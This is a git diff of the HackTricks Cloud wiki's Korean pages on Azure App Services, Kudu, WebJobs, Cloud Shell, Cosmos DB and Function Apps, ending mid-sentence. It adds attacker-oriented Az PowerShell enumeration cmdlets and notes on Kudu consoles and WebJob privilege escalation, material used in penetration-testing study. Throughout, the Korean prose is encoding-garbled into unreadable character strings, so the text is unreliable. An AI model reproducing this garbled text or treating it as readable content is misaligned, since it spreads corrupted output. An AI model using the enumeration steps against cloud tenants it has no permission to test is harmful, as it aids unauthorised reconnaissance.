+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-services.md index 794fa07f9..54b2dafb1 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-app-services.md +++ b/src/pentesting-cloud/azure-security/az-services/az-app-services.md @@ -44,7 +44,7 @@ Kudu๋Š” **SCM๊ณผ ์›น ๋ฐ API ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ๊ด€๋ฆฌ**ํ•˜์—ฌ App Service๋ฅผ Kudu๋Š” App Services์™€ Function Apps์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๋ฒ„์ „์ด ๋‹ค๋ฅด๋ฉฐ, Function Apps์˜ ๋ฒ„์ „์€ ํ›จ์”ฌ ๋” ์ œํ•œ์ ์ž…๋‹ˆ๋‹ค. Kudu์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ๋ช‡ ๊ฐ€์ง€ ํฅ๋ฏธ๋กœ์šด ์—”๋“œํฌ์ธํŠธ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: -- `/BasicAuth`: Kudu์— **๋กœ๊ทธ์ธํ•˜๊ธฐ ์œ„ํ•ด ์ด ๊ฒฝ๋กœ์— ์ ‘๊ทผํ•ด์•ผ** ํ•ฉ๋‹ˆ๋‹ค. +- `/BasicAuth`: Kudu์— **๋กœ๊ทธ์ธํ•˜๊ธฐ ์œ„ํ•ด ์ด ๊ฒฝ๋กœ์— ์ ‘๊ทผํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค**. - `/DebugConsole`: Kudu๊ฐ€ ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š” ํ™˜๊ฒฝ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์ฝ˜์†”์ž…๋‹ˆ๋‹ค. - ์ด ํ™˜๊ฒฝ์€ **๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์„œ๋น„์Šค์— ์ ‘๊ทผํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค**. - `/webssh/host`: ์•ฑ์ด ์‹คํ–‰๋˜๊ณ  ์žˆ๋Š” ์ปจํ…Œ์ด๋„ˆ ๋‚ด์— ์—ฐ๊ฒฐํ•  ์ˆ˜ ์žˆ๋Š” ์›น ๊ธฐ๋ฐ˜ SSH ํด๋ผ์ด์–ธํŠธ์ž…๋‹ˆ๋‹ค. @@ -52,7 +52,7 @@ Kudu์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ๋Š” ๋ช‡ ๊ฐ€์ง€ ํฅ๋ฏธ๋กœ์šด ์—”๋“œํฌ์ธํŠธ๋Š” ๋‹ค์Œ - `/Env`: ์‹œ์Šคํ…œ, ์•ฑ ์„ค์ •, ํ™˜๊ฒฝ ๋ณ€์ˆ˜, ์—ฐ๊ฒฐ ๋ฌธ์ž์—ด ๋ฐ HTTP ํ—ค๋”์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ๊ฐ€์ ธ์˜ต๋‹ˆ๋‹ค. - `/wwwroot/`: ์›น ์•ฑ์˜ ๋ฃจํŠธ ๋””๋ ‰ํ† ๋ฆฌ์ž…๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—์„œ ๋ชจ๋“  ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -๋˜ํ•œ, Kudu๋Š” [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu)์—์„œ ์˜คํ”ˆ ์†Œ์Šค์˜€์œผ๋‚˜, ํ”„๋กœ์ ํŠธ๊ฐ€ ์ค‘๋‹จ๋˜์—ˆ์œผ๋ฉฐ ํ˜„์žฌ Azure์˜ Kudu์™€ ์ด์ „ Kudu์˜ ๋™์ž‘์„ ๋น„๊ตํ•˜๋ฉด **์—ฌ๋Ÿฌ ๊ฐ€์ง€๊ฐ€ ์ด๋ฏธ ๋ณ€๊ฒฝ๋˜์—ˆ์Œ์„** ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +๋˜ํ•œ, Kudu๋Š” [https://github.com/projectkudu/kudu](https://github.com/projectkudu/kudu)์—์„œ ์˜คํ”ˆ ์†Œ์Šค์˜€์œผ๋‚˜, ํ”„๋กœ์ ํŠธ๊ฐ€ ์ค‘๋‹จ๋˜์—ˆ์œผ๋ฉฐ ํ˜„์žฌ Azure์˜ Kudu์™€ ์ด์ „ Kudu์˜ ๋™์ž‘์„ ๋น„๊ตํ•˜๋ฉด **์—ฌ๋Ÿฌ ๊ฐ€์ง€๊ฐ€ ์ด๋ฏธ ๋ณ€๊ฒฝ๋˜์—ˆ์Œ์„ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ## Sources @@ -72,12 +72,12 @@ App Services๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ ์ฝ”๋“œ๋ฅผ zip ํŒŒ์ผ๋กœ ์—…๋กœ๋“œํ•  ์ˆ˜ ์žˆ์ง€ Azure WebJobs๋Š” **Azure App Service ํ™˜๊ฒฝ์—์„œ ์‹คํ–‰๋˜๋Š” ๋ฐฑ๊ทธ๋ผ์šด๋“œ ์ž‘์—…**์ž…๋‹ˆ๋‹ค. ๊ฐœ๋ฐœ์ž๊ฐ€ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜๊ณผ ํ•จ๊ป˜ ์Šคํฌ๋ฆฝํŠธ๋‚˜ ํ”„๋กœ๊ทธ๋žจ์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜์—ฌ ํŒŒ์ผ ์ฒ˜๋ฆฌ, ๋ฐ์ดํ„ฐ ์ฒ˜๋ฆฌ ๋˜๋Š” ์˜ˆ์•ฝ๋œ ์ž‘์—…๊ณผ ๊ฐ™์€ ๋น„๋™๊ธฐ ๋˜๋Š” ์‹œ๊ฐ„ ์ง‘์•ฝ์ ์ธ ์ž‘์—…์„ ๋” ์‰ฝ๊ฒŒ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์›น์žก์—๋Š” 2๊ฐ€์ง€ ์œ ํ˜•์ด ์žˆ์Šต๋‹ˆ๋‹ค: -- **์ง€์†์ **: ๋ฌดํ•œ ๋ฃจํ”„์—์„œ ์‹คํ–‰๋˜๋ฉฐ ์ƒ์„ฑ๋˜์ž๋งˆ์ž ํŠธ๋ฆฌ๊ฑฐ๋ฉ๋‹ˆ๋‹ค. ์ง€์†์ ์ธ ์ฒ˜๋ฆฌ๊ฐ€ ํ•„์š”ํ•œ ์ž‘์—…์— ์ด์ƒ์ ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ Always On์ด ๋น„ํ™œ์„ฑํ™”๋˜์–ด ์•ฑ์ด ์ค‘์ง€๋˜๊ณ  ์ง€๋‚œ 20๋ถ„ ๋™์•ˆ ์š”์ฒญ์„ ๋ฐ›์ง€ ์•Š์œผ๋ฉด ์›น์žก๋„ ์ค‘์ง€๋ฉ๋‹ˆ๋‹ค. +- **์ง€์†์ **: ๋ฌดํ•œ ๋ฃจํ”„์—์„œ ์‹คํ–‰๋˜๋ฉฐ ์ƒ์„ฑ๋˜์ž๋งˆ์ž ํŠธ๋ฆฌ๊ฑฐ๋ฉ๋‹ˆ๋‹ค. ์ง€์†์ ์ธ ์ฒ˜๋ฆฌ๊ฐ€ ํ•„์š”ํ•œ ์ž‘์—…์— ์ด์ƒ์ ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ Always On์ด ๋น„ํ™œ์„ฑํ™”๋˜์–ด ์•ฑ์ด 20๋ถ„ ๋™์•ˆ ์š”์ฒญ์„ ๋ฐ›์ง€ ์•Š์œผ๋ฉด ์›น์žก๋„ ์ค‘์ง€๋ฉ๋‹ˆ๋‹ค. - **ํŠธ๋ฆฌ๊ฑฐ**: ํ•„์š”์— ๋”ฐ๋ผ ๋˜๋Š” ์ผ์ •์— ๋”ฐ๋ผ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ๋ฐฐ์น˜ ๋ฐ์ดํ„ฐ ์—…๋ฐ์ดํŠธ ๋˜๋Š” ์œ ์ง€ ๊ด€๋ฆฌ ๋ฃจํ‹ด๊ณผ ๊ฐ™์€ ์ฃผ๊ธฐ์ ์ธ ์ž‘์—…์— ๊ฐ€์žฅ ์ ํ•ฉํ•ฉ๋‹ˆ๋‹ค. ์›น์žก์€ ํ™˜๊ฒฝ์—์„œ **์ฝ”๋“œ๋ฅผ ์‹คํ–‰**ํ•˜๊ณ  ์—ฐ๊ฒฐ๋œ ๊ด€๋ฆฌ ID์— ๋Œ€ํ•œ **๊ถŒํ•œ ์ƒ์Šน**์— ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ณต๊ฒฉ์ž์˜ ๊ด€์ ์—์„œ ๋งค์šฐ ํฅ๋ฏธ๋กญ์Šต๋‹ˆ๋‹ค. -๋˜ํ•œ, ์›น์žก์—์„œ ์ƒ์„ฑ๋œ **๋กœ๊ทธ**๋ฅผ ํ™•์ธํ•˜๋Š” ๊ฒƒ๋„ ํ•ญ์ƒ ํฅ๋ฏธ๋กญ์Šต๋‹ˆ๋‹ค. ์ด ๋กœ๊ทธ์—๋Š” **๋ฏผ๊ฐํ•œ ์ •๋ณด**๊ฐ€ ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +๋˜ํ•œ, ์›น์žก์—์„œ ์ƒ์„ฑ๋œ **๋กœ๊ทธ**๋ฅผ ํ™•์ธํ•˜๋Š” ๊ฒƒ๋„ ํ•ญ์ƒ ํฅ๋ฏธ๋กญ์Šต๋‹ˆ๋‹ค. ๋กœ๊ทธ์—๋Š” **๋ฏผ๊ฐํ•œ ์ •๋ณด**๊ฐ€ ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ## Slots @@ -87,9 +87,9 @@ Azure App Service Slots๋Š” **๋™์ผํ•œ App Service์— ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋‹ค ## Azure Function Apps -๊ธฐ๋ณธ์ ์œผ๋กœ **Azure Function ์•ฑ์€ Azure App Service์˜ ํ•˜์œ„ ์ง‘ํ•ฉ**์ž…๋‹ˆ๋‹ค. ์›น ์ฝ˜์†”์— ๊ฐ€์„œ ๋ชจ๋“  ์•ฑ ์„œ๋น„์Šค๋ฅผ ๋‚˜์—ดํ•˜๊ฑฐ๋‚˜ az cli์—์„œ `az webapp list`๋ฅผ ์‹คํ–‰ํ•˜๋ฉด **Function ์•ฑ๋„ ๋‚˜์—ด๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. +๊ธฐ๋ณธ์ ์œผ๋กœ **Azure Function ์•ฑ์€ Azure App Service์˜ ํ•˜์œ„ ์ง‘ํ•ฉ**์ž…๋‹ˆ๋‹ค. ์›น ์ฝ˜์†”๋กœ ์ด๋™ํ•˜์—ฌ ๋ชจ๋“  ์•ฑ ์„œ๋น„์Šค๋ฅผ ๋‚˜์—ดํ•˜๊ฑฐ๋‚˜ az cli์—์„œ `az webapp list`๋ฅผ ์‹คํ–‰ํ•˜๋ฉด **Function ์•ฑ๋„ ๋‚˜์—ด๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. -๋”ฐ๋ผ์„œ ๋‘ ์„œ๋น„์Šค๋Š” ์‹ค์ œ๋กœ ๋Œ€๋ถ€๋ถ„ **๊ฐ™์€ ๊ตฌ์„ฑ, ๊ธฐ๋Šฅ ๋ฐ ์˜ต์…˜์„ az cli์—์„œ** ๊ฐ€์ง€๊ณ  ์žˆ์ง€๋งŒ, ์•ฝ๊ฐ„ ๋‹ค๋ฅด๊ฒŒ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(์˜ˆ: appsettings์˜ ๊ธฐ๋ณธ๊ฐ’์ด๋‚˜ Function ์•ฑ์—์„œ์˜ ์Šคํ† ๋ฆฌ์ง€ ๊ณ„์ • ์‚ฌ์šฉ). +๋”ฐ๋ผ์„œ ๋‘ ์„œ๋น„์Šค๋Š” ์‹ค์ œ๋กœ ๋Œ€๋ถ€๋ถ„ **๊ฐ™์€ ๊ตฌ์„ฑ, ๊ธฐ๋Šฅ ๋ฐ ์˜ต์…˜์„ az cli์—์„œ ๊ฐ€์ง€๊ณ  ์žˆ์œผ๋ฉฐ**, ์•ฝ๊ฐ„ ๋‹ค๋ฅด๊ฒŒ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(์˜ˆ: appsettings์˜ ๊ธฐ๋ณธ๊ฐ’ ๋˜๋Š” Function ์•ฑ์—์„œ ์Šคํ† ๋ฆฌ์ง€ ๊ณ„์ •์˜ ์‚ฌ์šฉ). ## Enumeration @@ -181,10 +181,55 @@ az webapp hybrid-connections list --name --resource-group {{#tab name="Az Powershell" }} ```bash +Get-Command -Module Az.Websites + # Get App Services and Function Apps Get-AzWebApp # Get only App Services Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} + +# Retrieves details of a specific App Service Environment in the specified resource group. +Get-AzAppServiceEnvironment -ResourceGroupName -Name +# Retrieves the access restriction configuration for a specified Web App. +Get-AzWebAppAccessRestrictionConfig -ResourceGroupName -Name +# Retrieves the SSL certificates for a specified resource group. +Get-AzWebAppCertificate -ResourceGroupName +# Retrieves the continuous deployment URL for a containerized Web App. +Get-AzWebAppContainerContinuousDeploymentUrl -ResourceGroupName -Name +# Retrieves the list of continuous WebJobs for a specified Web App. +Get-AzWebAppWebJob -ResourceGroupName -AppName +# Retrieves the list of triggered WebJobs for a specified Web App. +Get-AzWebAppTriggeredWebJob -ResourceGroupName -AppName + +# Retrieves details of a deleted Web App in the specified resource group. +Get-AzDeletedWebApp -ResourceGroupName -Name +# Retrieves a list of snapshots for a specified Web App. +Get-AzWebAppSnapshot -ResourceGroupName -Name +# Retrieves the history of a specific triggered WebJob for a Web App. +Get-AzWebAppTriggeredWebJobHistory -ResourceGroupName -AppName -Name + +# Retrieves information about deployment slots for a specified Web App. +Get-AzWebAppSlot -ResourceGroupName -Name +# Retrieves the continuous WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotWebJob -ResourceGroupName -AppName -SlotName +# Retrieves the triggered WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotTriggeredWebJob -ResourceGroupName -AppName -SlotName +# Retrieves the history of a specific triggered WebJob for a deployment slot of a Web App. +Get-AzWebAppSlotTriggeredWebJobHistory -ResourceGroupName -AppName -SlotName -Name +# Retrieves the continuous WebJobs for a Web App. +Get-AzWebAppContinuousWebJob -ResourceGroupName -AppName +# Retrieves the continuous WebJobs for a specific deployment slot of a Web App. +Get-AzWebAppSlotContinuousWebJob -ResourceGroupName -AppName -SlotName + +# Retrieves the traffic routing rules for a Web App. +Get-AzWebAppTrafficRouting -ResourceGroupName -WebAppName -RuleName + +# Retrieves details of a specific backup for a Web App. +Get-AzWebAppBackup -ResourceGroupName -Name -BackupId +# Retrieves the backup configuration for a Web App. +Get-AzWebAppBackupConfiguration -ResourceGroupName -Name +# Retrieves the list of all backups for a Web App. +Get-AzWebAppBackupList -ResourceGroupName -Name ``` {{#endtab }} diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md new file mode 100644 index 000000000..b27e02ed4 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md @@ -0,0 +1,58 @@ +# Az - Cloud Shell + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Azure Cloud Shell + +**Azure Cloud Shell**๋Š” Azure ๋ฆฌ์†Œ์Šค๋ฅผ ๊ด€๋ฆฌํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ ๋Œ€ํ™”ํ˜• ์ธ์ฆ ๋ธŒ๋ผ์šฐ์ € ์ ‘๊ทผ ํ„ฐ๋ฏธ๋„๋กœ, Bash ๋˜๋Š” PowerShell ์ค‘ ํ•˜๋‚˜๋กœ ์ž‘์—…ํ•  ์ˆ˜ ์žˆ๋Š” ์œ ์—ฐ์„ฑ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด ์„œ๋น„์Šค๋Š” ๋น„ํ™œ์„ฑ ์ƒํƒœ๊ฐ€ 20๋ถ„์ด ์ง€๋‚˜๋ฉด ํƒ€์ž„์•„์›ƒ๋˜๋Š” ์ž„์‹œ ์„ธ์…˜ ํ˜ธ์ŠคํŠธ์—์„œ ์‹คํ–‰๋˜๋ฉฐ, $HOME ์œ„์น˜์— 5-GB ํŒŒ์ผ ๊ณต์œ ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํŒŒ์ผ์„ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค. Cloud Shell์€ Azure ํฌํ„ธ, shell.azure.com, Azure CLI ๋ฐ PowerShell ๋ฌธ์„œ, Azure ๋ชจ๋ฐ”์ผ ์•ฑ, Visual Studio Code Azure ๊ณ„์ • ํ™•์žฅ ๋“ฑ ์—ฌ๋Ÿฌ ์ง€์ ์„ ํ†ตํ•ด ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. + +์ด ์„œ๋น„์Šค์—๋Š” ๊ถŒํ•œ์ด ํ• ๋‹น๋˜์ง€ ์•Š์œผ๋ฏ€๋กœ ๊ถŒํ•œ ์ƒ์Šน ๊ธฐ์ˆ ์ด ์—†์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ ์–ด๋–ค ์ข…๋ฅ˜์˜ ์—ด๊ฑฐ๋„ ์—†์Šต๋‹ˆ๋‹ค. + +### ์ฃผ์š” ๊ธฐ๋Šฅ + +**ํ™˜๊ฒฝ**: Azure Cloud Shell์€ ํด๋ผ์šฐ๋“œ ์ธํ”„๋ผ๋ฅผ ์œ„ํ•ด ์„ค๊ณ„๋œ Microsoft์˜ ์ž์ฒด Linux ๋ฐฐํฌํŒ์ธ Azure Linux์—์„œ ์‹คํ–‰๋˜์–ด ์•ˆ์ „ํ•œ ํ™˜๊ฒฝ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. Azure Linux ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— ํฌํ•จ๋œ ๋ชจ๋“  ํŒจํ‚ค์ง€๋Š” ๊ณต๊ธ‰๋ง ๊ณต๊ฒฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด Microsoft์— ์˜ํ•ด ๋‚ด๋ถ€์ ์œผ๋กœ ์ปดํŒŒ์ผ๋ฉ๋‹ˆ๋‹ค. +**์‚ฌ์ „ ์„ค์น˜๋œ ๋„๊ตฌ**: Cloud Shell์—๋Š” Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git ๋ฐ vim, nano, emacs์™€ ๊ฐ™์€ ํ…์ŠคํŠธ ํŽธ์ง‘๊ธฐ์™€ ๊ฐ™์€ ํฌ๊ด„์ ์ธ ์‚ฌ์ „ ์„ค์น˜ ๋„๊ตฌ ์„ธํŠธ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋„๊ตฌ๋Š” ์ฆ‰์‹œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์„ค์น˜๋œ ํŒจํ‚ค์ง€ ๋ฐ ๋ชจ๋“ˆ์„ ๋‚˜์—ดํ•˜๋ ค๋ฉด "Get-Module -ListAvailable", "tdnf list" ๋ฐ "pip3 list"๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**$HOME ์ง€์†์„ฑ**: Azure Cloud Shell์„ ์ฒ˜์Œ ์‹œ์ž‘ํ•  ๋•Œ, ์—ฐ๊ฒฐ๋œ ์Šคํ† ๋ฆฌ์ง€ ๊ณ„์ •์ด ์žˆ๊ฑฐ๋‚˜ ์—†๊ฑฐ๋‚˜ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์Šคํ† ๋ฆฌ์ง€๋ฅผ ์—ฐ๊ฒฐํ•˜์ง€ ์•Š์œผ๋ฉด ์„ธ์…˜์ด ์ข…๋ฃŒ๋  ๋•Œ ํŒŒ์ผ์ด ์‚ญ์ œ๋˜๋Š” ์ผ์‹œ์ ์ธ ์„ธ์…˜์ด ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์„ธ์…˜ ๊ฐ„ ํŒŒ์ผ์„ ์œ ์ง€ํ•˜๋ ค๋ฉด ์Šคํ† ๋ฆฌ์ง€ ๊ณ„์ •์„ ๋งˆ์šดํŠธํ•ด์•ผ ํ•˜๋ฉฐ, ์ด๋Š” ์ž๋™์œผ๋กœ **$HOME\clouddrive**๋กœ ์—ฐ๊ฒฐ๋˜๋ฉฐ, **$HOME** ๋””๋ ‰ํ† ๋ฆฌ๋Š” Azure File Share์— **.img** ํŒŒ์ผ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ $HOME ์™ธ๋ถ€์˜ ํŒŒ์ผ๊ณผ ๋จธ์‹  ์ƒํƒœ๋Š” ์œ ์ง€๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. SSH ํ‚ค์™€ ๊ฐ™์€ ๋น„๋ฐ€์„ ์•ˆ์ „ํ•˜๊ฒŒ ์ €์žฅํ•˜๋ ค๋ฉด Azure Key Vault๋ฅผ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค. +**Azure ๋“œ๋ผ์ด๋ธŒ (Azure:)**: Azure Cloud Shell์˜ PowerShell์—๋Š” Azure ๋ฆฌ์†Œ์Šค(Compute, Network, Storage ๋“ฑ)๋ฅผ ํŒŒ์ผ ์‹œ์Šคํ…œ๊ณผ ์œ ์‚ฌํ•œ ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ์‰ฝ๊ฒŒ ํƒ์ƒ‰ํ•  ์ˆ˜ ์žˆ๋Š” Azure ๋“œ๋ผ์ด๋ธŒ(Azure:)๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. cd Azure:๋กœ Azure ๋“œ๋ผ์ด๋ธŒ๋กœ ์ „ํ™˜ํ•˜๊ณ  cd ~๋กœ ํ™ˆ ๋””๋ ‰ํ† ๋ฆฌ๋กœ ๋Œ์•„๊ฐˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ์ „ํžˆ Azure PowerShell cmdlet์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ชจ๋“  ๋“œ๋ผ์ด๋ธŒ์—์„œ ๋ฆฌ์†Œ์Šค๋ฅผ ๊ด€๋ฆฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**์‚ฌ์šฉ์ž ์ •์˜ ๋„๊ตฌ ์„ค์น˜**: ์Šคํ† ๋ฆฌ์ง€ ๊ณ„์ •์œผ๋กœ Cloud Shell์„ ๊ตฌ์„ฑํ•œ ์‚ฌ์šฉ์ž๋Š” ๋ฃจํŠธ ๊ถŒํ•œ์ด ํ•„์š”ํ•˜์ง€ ์•Š์€ ์ถ”๊ฐ€ ๋„๊ตฌ๋ฅผ ์„ค์น˜ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ธฐ๋Šฅ์€ Cloud Shell ํ™˜๊ฒฝ์„ ์ถ”๊ฐ€๋กœ ์‚ฌ์šฉ์ž ์ •์˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜์—ฌ ์‚ฌ์šฉ์ž๊ฐ€ ํŠน์ • ์š”๊ตฌ์— ๋งž๊ฒŒ ์„ค์ •์„ ์กฐ์ •ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. + +## ์ฐธ์กฐ + +* [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview) +* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features) +* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window) + + +## ์ง€์†์„ฑ + +{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %} +[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md index 35dda4ac1..33d5e791a 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md +++ b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md @@ -21,7 +21,7 @@ Learn & practice GCP Hacking: --database-name az cosmosdb mongodb role definition list --account-name --resource-group # List all user definitions for MongoDB within an Azure Cosmos DB account az cosmosdb mongodb user definition list --account-name --resource-group - ``` {% endcode %} {% endtab %} @@ -363,7 +362,7 @@ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ณ  ์—ฐ์Šตํ•˜๊ธฐ: [!NOTE] -> ํ•จ์ˆ˜ ํ˜ธ์ถœ์„ ์œ„ํ•ด ์‚ฌ์šฉ์ž์—๊ฒŒ ์•ก์„ธ์Šค๋ฅผ ๋ถ€์—ฌํ•˜๋Š” RBAC ๊ถŒํ•œ์ด ์—†๋‹ค๋Š” ์ ์— ์œ ์˜ํ•˜์„ธ์š”. **ํ•จ์ˆ˜ ํ˜ธ์ถœ์€ ์ƒ์„ฑ ์‹œ ์„ ํƒ๋œ ํŠธ๋ฆฌ๊ฑฐ์— ๋”ฐ๋ผ ๋‹ฌ๋ผ์ง€๋ฉฐ**, HTTP ํŠธ๋ฆฌ๊ฑฐ๊ฐ€ ์„ ํƒ๋œ ๊ฒฝ์šฐ **์•ก์„ธ์Šค ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•ด์•ผ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +> ํ•จ์ˆ˜ ํ˜ธ์ถœ์— ๋Œ€ํ•œ ์•ก์„ธ์Šค๋ฅผ ์‚ฌ์šฉ์ž์—๊ฒŒ ๋ถ€์—ฌํ•˜๋Š” RBAC ๊ถŒํ•œ์ด ์—†์Œ์„ ์œ ์˜ํ•˜์‹ญ์‹œ์˜ค. **ํ•จ์ˆ˜ ํ˜ธ์ถœ์€ ์ƒ์„ฑ ์‹œ ์„ ํƒ๋œ ํŠธ๋ฆฌ๊ฑฐ์— ๋”ฐ๋ผ ๋‹ฌ๋ผ์ง€๋ฉฐ, HTTP ํŠธ๋ฆฌ๊ฑฐ๊ฐ€ ์„ ํƒ๋œ ๊ฒฝ์šฐ **์•ก์„ธ์Šค ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•ด์•ผ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.** HTTP ํŠธ๋ฆฌ๊ฑฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•จ์ˆ˜ ๋‚ด์—์„œ ์—”๋“œํฌ์ธํŠธ๋ฅผ ์ƒ์„ฑํ•  ๋•Œ, ํ•จ์ˆ˜ ํŠธ๋ฆฌ๊ฑฐ์— ํ•„์š”ํ•œ **์•ก์„ธ์Šค ํ‚ค ๊ถŒํ•œ ์ˆ˜์ค€**์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์„ธ ๊ฐ€์ง€ ์˜ต์…˜์ด 